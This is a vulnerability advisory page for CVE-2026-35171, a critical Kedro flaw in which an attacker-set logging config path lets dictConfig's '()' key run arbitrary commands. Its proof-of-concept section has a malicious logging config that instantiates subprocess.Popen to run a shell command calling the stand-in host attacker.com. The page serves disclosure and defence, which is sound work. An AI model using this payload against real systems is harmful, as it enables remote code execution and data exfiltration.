Security Vulnerability Report
中文
CVE-2026-35171 CVSS 9.8 CRITICAL

CVE-2026-35171

Published: 2026-04-06 18:16:43
Last Modified: 2026-04-14 15:36:22
Source: [email protected]

Description

Kedro is a toolbox for production-ready data science. Prior to 1.3.0, Kedro allows the logging configuration file path to be set via the KEDRO_LOGGING_CONFIG environment variable and loads it without validation. The logging configuration schema supports the special () key, which enables arbitrary callable instantiation. An attacker can exploit this to execute arbitrary system commands during application startup. This is a critical remote code execution (RCE) vulnerability caused by unsafe use of logging.config.dictConfig() with user-controlled input. This vulnerability is fixed in 1.3.0.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:linuxfoundation:kedro:*:*:*:*:*:python:*:* - VULNERABLE
Kedro < 1.3.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# malicious_config.py import os # Malicious logging configuration exploiting the dictConfig feature LOGGING_CONFIG = { 'version': 1, 'disable_existing_loggers': False, 'formatters': { 'standard': { 'format': '%(asctime)s [%(levelname)s] %(name)s: %(message)s' } }, 'handlers': { # Exploit: Use the special '()' key to instantiate subprocess.Popen 'exploit': { '()': 'subprocess.Popen', 'args': (['/bin/sh', '-c', 'touch /tmp/pwned; curl http://attacker.com/exfil'],) } }, 'root': { 'level': 'INFO', 'handlers': ['exploit'] } } # Attacker sets environment variable: # export KEDRO_LOGGING_CONFIG=/path/to/malicious_config.py

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35171", "sourceIdentifier": "[email protected]", "published": "2026-04-06T18:16:43.373", "lastModified": "2026-04-14T15:36:21.790", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Kedro is a toolbox for production-ready data science. Prior to 1.3.0, Kedro allows the logging configuration file path to be set via the KEDRO_LOGGING_CONFIG environment variable and loads it without validation. The logging configuration schema supports the special () key, which enables arbitrary callable instantiation. An attacker can exploit this to execute arbitrary system commands during application startup. This is a critical remote code execution (RCE) vulnerability caused by unsafe use of logging.config.dictConfig() with user-controlled input. This vulnerability is fixed in 1.3.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}, {"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:linuxfoundation:kedro:*:*:*:*:*:python:*:*", "versionEndExcluding": "1.3.0", "matchCriteriaId": "24F97BC8-D0B5-4D19-A22A-81F2A4FDED0E"}]}]}], "references": [{"url": "https://github.com/kedro-org/kedro/security/advisories/GHSA-9cqf-439c-j96r", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.